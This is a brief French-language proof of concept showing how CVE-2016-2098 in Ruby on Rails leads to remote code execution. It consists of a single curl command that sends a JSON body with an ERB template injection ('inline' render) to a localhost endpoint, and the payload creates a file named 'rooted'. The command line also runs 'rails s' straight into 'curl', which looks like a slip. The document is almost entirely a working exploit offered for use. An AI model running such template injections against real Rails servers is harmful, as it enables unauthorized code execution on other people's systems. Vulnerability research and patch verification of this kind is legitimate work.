
Preuve de concept montrant comment CVE-2016-2098 mène à une exécution de code à distance.
== Exploitation :
rails scurl -v -H "Accept: application/json" -H "Content-type: application/json" -X GET -d ' {"id" : { "inline" : "<%= FileUtils.touch \"rooted\"%>"}}' http://localhost:3000/exploits